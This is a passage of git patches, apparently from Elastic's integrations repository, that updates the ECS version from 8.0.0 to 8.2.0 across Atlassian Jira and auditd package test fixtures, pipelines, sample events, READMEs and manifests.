"version": "8.2.0" }, "related": { "user": [ @@ -2291,7 +2291,7 @@ { "@timestamp": "2021-11-22T00:08:34.215Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2360,7 +2360,7 @@ { "@timestamp": "2021-11-22T00:08:34.212Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2434,7 +2434,7 @@ { "@timestamp": "2021-11-22T00:08:34.210Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2508,7 +2508,7 @@ { "@timestamp": "2021-11-22T00:08:34.208Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2577,7 +2577,7 @@ { "@timestamp": "2021-11-22T00:08:34.204Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2651,7 +2651,7 @@ { "@timestamp": "2021-11-22T00:08:34.190Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2720,7 +2720,7 @@ { "@timestamp": "2021-11-22T00:08:34.187Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
@@ -2789,7 +2789,7 @@ { "@timestamp": "2021-11-22T00:08:34.184Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2863,7 +2863,7 @@ { "@timestamp": "2021-11-22T00:08:34.182Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2932,7 +2932,7 @@ { "@timestamp": "2021-11-22T00:08:34.180Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3001,7 +3001,7 @@ { "@timestamp": "2021-11-22T00:08:34.178Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3070,7 +3070,7 @@ { "@timestamp": "2021-11-22T00:08:34.176Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3139,7 +3139,7 @@ { "@timestamp": "2021-11-22T00:08:34.174Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3208,7 +3208,7 @@ { "@timestamp": "2021-11-22T00:08:34.173Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3282,7 +3282,7 @@ { "@timestamp": "2021-11-22T00:08:34.171Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3351,7 +3351,7 @@ { "@timestamp": "2021-11-22T00:08:34.168Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3420,7 +3420,7 @@ { "@timestamp": "2021-11-22T00:08:34.166Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3489,7 +3489,7 @@ { "@timestamp": "2021-11-22T00:08:34.165Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3558,7 +3558,7 @@ { "@timestamp": "2021-11-22T00:08:34.163Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3627,7 +3627,7 @@ { "@timestamp": "2021-11-22T00:08:34.151Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
@@ -3696,7 +3696,7 @@ { "@timestamp": "2021-11-22T00:08:34.142Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3765,7 +3765,7 @@ { "@timestamp": "2021-11-22T00:08:34.072Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3828,7 +3828,7 @@ { "@timestamp": "2021-11-22T00:08:33.887Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3924,7 +3924,7 @@ { "@timestamp": "2021-11-22T00:08:33.746Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3987,7 +3987,7 @@ { "@timestamp": "2021-11-22T00:08:33.732Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4056,7 +4056,7 @@ { "@timestamp": "2021-11-22T00:08:33.710Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4135,7 +4135,7 @@ { "@timestamp": "2021-11-22T00:08:33.537Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4199,7 +4199,7 @@ { "@timestamp": "2021-11-22T00:08:33.536Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4263,7 +4263,7 @@ { "@timestamp": "2021-11-22T00:08:33.535Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4327,7 +4327,7 @@ { "@timestamp": "2021-11-22T00:08:33.534Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4391,7 +4391,7 @@ { "@timestamp": "2021-11-22T00:07:09.088Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4465,7 +4465,7 @@ { "@timestamp": "2021-11-22T00:07:09.037Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4526,7 +4526,7 @@ { "@timestamp": "2021-11-22T00:07:02.794Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
@@ -4600,7 +4600,7 @@ { "@timestamp": "2021-11-22T00:07:02.725Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4674,7 +4674,7 @@ { "@timestamp": "2021-11-22T00:07:02.694Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4748,7 +4748,7 @@ { "@timestamp": "2021-11-22T00:07:01.669Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4822,7 +4822,7 @@ { "@timestamp": "2021-11-22T00:07:01.644Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4896,7 +4896,7 @@ { "@timestamp": "2021-11-22T00:06:59.522Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4970,7 +4970,7 @@ { "@timestamp": "2021-11-22T00:06:59.485Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5031,7 +5031,7 @@ { "@timestamp": "2021-11-22T00:06:59.340Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5088,7 +5088,7 @@ { "@timestamp": "2021-11-22T00:06:59.332Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5145,7 +5145,7 @@ { "@timestamp": "2021-11-22T00:06:59.313Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5214,7 +5214,7 @@ { "@timestamp": "2021-11-22T00:06:59.266Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5288,7 +5288,7 @@ { "@timestamp": "2021-11-22T00:06:59.224Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5362,7 +5362,7 @@ { "@timestamp": "2021-11-22T00:06:58.990Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5419,7 +5419,7 @@ { "@timestamp": "2021-11-22T00:06:58.974Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
@@ -5488,7 +5488,7 @@ { "@timestamp": "2021-11-22T00:06:58.318Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5557,7 +5557,7 @@ { "@timestamp": "2021-11-22T00:06:57.162Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5631,7 +5631,7 @@ { "@timestamp": "2021-11-22T00:06:57.158Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5705,7 +5705,7 @@ { "@timestamp": "2021-11-22T00:06:57.138Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5779,7 +5779,7 @@ { "@timestamp": "2021-11-22T00:06:49.756Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5855,7 +5855,7 @@ { "@timestamp": "2021-11-22T00:06:49.754Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5929,7 +5929,7 @@ { "@timestamp": "2021-11-22T00:06:49.752Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6003,7 +6003,7 @@ { "@timestamp": "2021-11-22T00:06:49.751Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6077,7 +6077,7 @@ { "@timestamp": "2021-11-22T00:06:49.750Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6151,7 +6151,7 @@ { "@timestamp": "2021-11-22T00:06:49.734Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6227,7 +6227,7 @@ { "@timestamp": "2021-11-22T00:06:49.600Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6322,7 +6322,7 @@ { "@timestamp": "2021-11-22T00:05:08.596Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6415,7 +6415,7 @@ { "@timestamp": "2021-11-22T00:05:08.584Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
@@ -6489,7 +6489,7 @@ { "@timestamp": "2021-11-22T00:05:08.583Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6563,7 +6563,7 @@ { "@timestamp": "2021-11-22T00:05:08.581Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6637,7 +6637,7 @@ { "@timestamp": "2021-11-22T00:05:08.579Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6711,7 +6711,7 @@ { "@timestamp": "2021-11-22T00:05:08.514Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6776,7 +6776,7 @@ { "@timestamp": "2021-11-28T18:18:26.076Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6848,7 +6848,7 @@ { "@timestamp": "2021-11-28T18:23:20.278Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6927,7 +6927,7 @@ { "@timestamp": "2021-11-28T18:23:13.741Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ diff --git a/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json b/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json index a6616341249..c517829e254 100644 --- a/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json +++ b/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json @@ -3,7 +3,7 @@ { "@timestamp": "2021-11-22T00:05:08.514Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -69,7 +69,7 @@ { "@timestamp": "2021-11-22T00:05:08.579Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -145,7 +145,7 @@ { "@timestamp": "2021-11-22T00:05:08.581Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
@@ -221,7 +221,7 @@ { "@timestamp": "2021-11-22T00:05:08.583Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -297,7 +297,7 @@ { "@timestamp": "2021-11-22T00:05:08.584Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -373,7 +373,7 @@ { "@timestamp": "2021-11-22T00:05:08.596Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -468,7 +468,7 @@ { "@timestamp": "2021-11-22T00:06:49.600Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -564,7 +564,7 @@ { "@timestamp": "2021-11-22T00:06:49.734Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -640,7 +640,7 @@ { "@timestamp": "2021-11-22T00:06:49.750Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -716,7 +716,7 @@ { "@timestamp": "2021-11-22T00:06:49.751Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -792,7 +792,7 @@ { "@timestamp": "2021-11-22T00:06:49.752Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -868,7 +868,7 @@ { "@timestamp": "2021-11-22T00:06:49.754Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -944,7 +944,7 @@ { "@timestamp": "2021-11-22T00:06:49.756Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1020,7 +1020,7 @@ { "@timestamp": "2021-11-22T00:06:57.138Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1095,7 +1095,7 @@ { "@timestamp": "2021-11-22T00:06:57.158Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1170,7 +1170,7 @@ { "@timestamp": "2021-11-22T00:06:57.162Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1245,7 +1245,7 @@ { "@timestamp": "2021-11-22T00:06:58.318Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
@@ -1315,7 +1315,7 @@ { "@timestamp": "2021-11-22T00:06:58.974Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1385,7 +1385,7 @@ { "@timestamp": "2021-11-22T00:06:58.990Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1443,7 +1443,7 @@ { "@timestamp": "2021-11-22T00:06:59.224Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1518,7 +1518,7 @@ { "@timestamp": "2021-11-22T00:06:59.266Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1593,7 +1593,7 @@ { "@timestamp": "2021-11-22T00:06:59.313Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1663,7 +1663,7 @@ { "@timestamp": "2021-11-22T00:06:59.332Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1721,7 +1721,7 @@ { "@timestamp": "2021-11-22T00:06:59.340Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1779,7 +1779,7 @@ { "@timestamp": "2021-11-22T00:06:59.485Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1842,7 +1842,7 @@ { "@timestamp": "2021-11-22T00:06:59.522Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1917,7 +1917,7 @@ { "@timestamp": "2021-11-22T00:07:01.644Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1992,7 +1992,7 @@ { "@timestamp": "2021-11-22T00:07:01.669Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2067,7 +2067,7 @@ { "@timestamp": "2021-11-22T00:07:02.694Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2142,7 +2142,7 @@ { "@timestamp": "2021-11-22T00:07:02.725Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
@@ -2217,7 +2217,7 @@ { "@timestamp": "2021-11-22T00:07:02.794Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2292,7 +2292,7 @@ { "@timestamp": "2021-11-22T00:07:09.370Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2355,7 +2355,7 @@ { "@timestamp": "2021-11-22T00:07:09.880Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2430,7 +2430,7 @@ { "@timestamp": "2021-11-22T00:08:33.534Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2495,7 +2495,7 @@ { "@timestamp": "2021-11-22T00:08:33.535Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2560,7 +2560,7 @@ { "@timestamp": "2021-11-22T00:08:33.536Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2625,7 +2625,7 @@ { "@timestamp": "2021-11-22T00:08:33.537Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2690,7 +2690,7 @@ { "@timestamp": "2021-11-22T00:08:33.710Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2770,7 +2770,7 @@ { "@timestamp": "2021-11-22T00:08:33.732Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2840,7 +2840,7 @@ { "@timestamp": "2021-11-22T00:08:33.746Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2903,7 +2903,7 @@ { "@timestamp": "2021-11-22T00:08:33.887Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2998,7 +2998,7 @@ { "@timestamp": "2021-11-22T00:08:34.720Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3061,7 +3061,7 @@ { "@timestamp": "2021-11-22T00:08:34.142Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
@@ -3131,7 +3131,7 @@ { "@timestamp": "2021-11-22T00:08:34.151Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3201,7 +3201,7 @@ { "@timestamp": "2021-11-22T00:08:34.163Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3271,7 +3271,7 @@ { "@timestamp": "2021-11-22T00:08:34.165Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3341,7 +3341,7 @@ { "@timestamp": "2021-11-22T00:08:34.166Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3411,7 +3411,7 @@ { "@timestamp": "2021-11-22T00:08:34.168Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3481,7 +3481,7 @@ { "@timestamp": "2021-11-22T00:08:34.171Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3551,7 +3551,7 @@ { "@timestamp": "2021-11-22T00:08:34.173Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3626,7 +3626,7 @@ { "@timestamp": "2021-11-22T00:08:34.174Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3696,7 +3696,7 @@ { "@timestamp": "2021-11-22T00:08:34.176Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3766,7 +3766,7 @@ { "@timestamp": "2021-11-22T00:08:34.178Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3836,7 +3836,7 @@ { "@timestamp": "2021-11-22T00:08:34.180Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3906,7 +3906,7 @@ { "@timestamp": "2021-11-22T00:08:34.182Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3976,7 +3976,7 @@ { "@timestamp": "2021-11-22T00:08:34.184Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
@@ -4051,7 +4051,7 @@ { "@timestamp": "2021-11-22T00:08:34.187Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4121,7 +4121,7 @@ { "@timestamp": "2021-11-22T00:08:34.190Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4191,7 +4191,7 @@ { "@timestamp": "2021-11-22T00:08:34.204Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4266,7 +4266,7 @@ { "@timestamp": "2021-11-22T00:08:34.208Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4336,7 +4336,7 @@ { "@timestamp": "2021-11-22T00:08:34.210Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4411,7 +4411,7 @@ { "@timestamp": "2021-11-22T00:08:34.212Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4486,7 +4486,7 @@ { "@timestamp": "2021-11-22T00:08:34.215Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4556,7 +4556,7 @@ { "@timestamp": "2021-11-22T00:08:34.217Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4631,7 +4631,7 @@ { "@timestamp": "2021-11-22T00:08:34.219Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4701,7 +4701,7 @@ { "@timestamp": "2021-11-22T00:08:34.221Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4776,7 +4776,7 @@ { "@timestamp": "2021-11-22T00:08:34.223Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4846,7 +4846,7 @@ { "@timestamp": "2021-11-22T00:08:34.225Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4916,7 +4916,7 @@ { "@timestamp": "2021-11-22T00:08:34.227Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
@@ -4991,7 +4991,7 @@ { "@timestamp": "2021-11-22T00:08:34.229Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5061,7 +5061,7 @@ { "@timestamp": "2021-11-22T00:08:34.231Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5136,7 +5136,7 @@ { "@timestamp": "2021-11-22T00:08:34.233Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5206,7 +5206,7 @@ { "@timestamp": "2021-11-22T00:08:34.235Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5276,7 +5276,7 @@ { "@timestamp": "2021-11-22T00:08:34.236Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5346,7 +5346,7 @@ { "@timestamp": "2021-11-22T00:08:34.239Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5416,7 +5416,7 @@ { "@timestamp": "2021-11-22T00:08:34.241Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5486,7 +5486,7 @@ { "@timestamp": "2021-11-22T00:08:34.243Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5556,7 +5556,7 @@ { "@timestamp": "2021-11-22T00:08:34.249Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5637,7 +5637,7 @@ { "@timestamp": "2021-11-22T00:08:34.266Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5700,7 +5700,7 @@ { "@timestamp": "2021-11-22T00:08:34.297Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5794,7 +5794,7 @@ { "@timestamp": "2021-11-22T00:08:34.506Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5864,7 +5864,7 @@ { "@timestamp": "2021-11-22T00:08:34.521Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
@@ -5939,7 +5939,7 @@ { "@timestamp": "2021-11-22T00:08:34.535Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6014,7 +6014,7 @@ { "@timestamp": "2021-11-22T00:08:34.543Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6089,7 +6089,7 @@ { "@timestamp": "2021-11-22T00:08:34.545Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6159,7 +6159,7 @@ { "@timestamp": "2021-11-22T00:12:02.856Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6231,7 +6231,7 @@ { "@timestamp": "2021-11-26T19:35:10.718Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6307,7 +6307,7 @@ { "@timestamp": "2021-11-26T19:33:29.363Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ diff --git a/packages/atlassian_jira/data_stream/audit/elasticsearch/ingest_pipeline/default.yml b/packages/atlassian_jira/data_stream/audit/elasticsearch/ingest_pipeline/default.yml index f1f95b9a441..05b6e111e62 100644 --- a/packages/atlassian_jira/data_stream/audit/elasticsearch/ingest_pipeline/default.yml +++ b/packages/atlassian_jira/data_stream/audit/elasticsearch/ingest_pipeline/default.yml @@ -6,7 +6,7 @@ processors: value: '{{_ingest.timestamp}}' - set: field: ecs.version - value: '8.0.0' + value: '8.2.0' - rename: field: message target_field: event.original diff --git a/packages/atlassian_jira/data_stream/audit/sample_event.json b/packages/atlassian_jira/data_stream/audit/sample_event.json index d70d5ea8d1f..3019d2e1cdf 100644 --- a/packages/atlassian_jira/data_stream/audit/sample_event.json +++ b/packages/atlassian_jira/data_stream/audit/sample_event.json @@ -13,7 +13,7 @@ "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "82d0dfd8-3946-4ac0-a092-a9146a71e3f7", 
diff --git a/packages/atlassian_jira/docs/README.md b/packages/atlassian_jira/docs/README.md
index 7a6da0635df..3d35249e477 100644
--- a/packages/atlassian_jira/docs/README.md
+++ b/packages/atlassian_jira/docs/README.md
@@ -113,7 +113,7 @@ An example event for `audit` looks as following:
 "type": "logs"
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "elastic_agent": {
 "id": "82d0dfd8-3946-4ac0-a092-a9146a71e3f7",
diff --git a/packages/atlassian_jira/manifest.yml b/packages/atlassian_jira/manifest.yml
index fbc8135926d..e9a73a3bb43 100644
--- a/packages/atlassian_jira/manifest.yml
+++ b/packages/atlassian_jira/manifest.yml
@@ -1,7 +1,7 @@
 format_version: 1.0.0
 name: atlassian_jira
 title: Atlassian Jira
-version: 1.1.0
+version: 1.2.0
 license: basic
 description: Collect logs from Atlassian Jira with Elastic Agent.
 type: integration
From 3194d8ed359d077f94de2aa8f4b8b497e262cfd5 Mon Sep 17 00:00:00 2001
From: Taylor Swanson
Date: Tue, 22 Feb 2022 12:39:14 -0600
Subject: [PATCH 06/23] Update auditd to ECS 8.2
---
 packages/auditd/_dev/build/build.yml | 2 +-
 packages/auditd/changelog.yml | 5 +
 .../test-auditd-raw.log-expected.json | 92 +++++++++----------
 .../test-auditd-useradd.log-expected.json | 16 ++--
 .../test-truncated-execve.log-expected.json | 8 +-
 .../elasticsearch/ingest_pipeline/default.yml | 2 +-
 .../auditd/data_stream/log/sample_event.json | 2 +-
 packages/auditd/docs/README.md | 2 +-
 packages/auditd/manifest.yml | 2 +-
 9 files changed, 68 insertions(+), 63 deletions(-)
diff --git a/packages/auditd/_dev/build/build.yml b/packages/auditd/_dev/build/build.yml
index 809e76063e9..d61527283ec 100644
--- a/packages/auditd/_dev/build/build.yml
+++ b/packages/auditd/_dev/build/build.yml
@@ -1,3 +1,3 @@
 dependencies:
 ecs:
- reference: git@8.0
+ reference: git@8.2
diff --git a/packages/auditd/changelog.yml b/packages/auditd/changelog.yml
index b0b3c953453..ff57fd06688 100644
--- a/packages/auditd/changelog.yml
+++ b/packages/auditd/changelog.yml
@@ -1,4 +1,9 @@ # newer versions go on top +- version: "2.2.0" + changes: + - description: Update to ECS 8.2 + type: enhancement + link: https://github.com/elastic/integrations/pull/xxxx - version: "2.1.0" changes: - description: Store EXECVE arguments in process.args array. diff --git a/packages/auditd/data_stream/log/_dev/test/pipeline/test-auditd-raw.log-expected.json b/packages/auditd/data_stream/log/_dev/test/pipeline/test-auditd-raw.log-expected.json index 311d3b3c551..f17c0642f97 100644 --- a/packages/auditd/data_stream/log/_dev/test/pipeline/test-auditd-raw.log-expected.json +++ b/packages/auditd/data_stream/log/_dev/test/pipeline/test-auditd-raw.log-expected.json @@ -15,7 +15,7 @@ "address": "192.168.0.0" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "mac_ipsec_event", @@ -50,7 +50,7 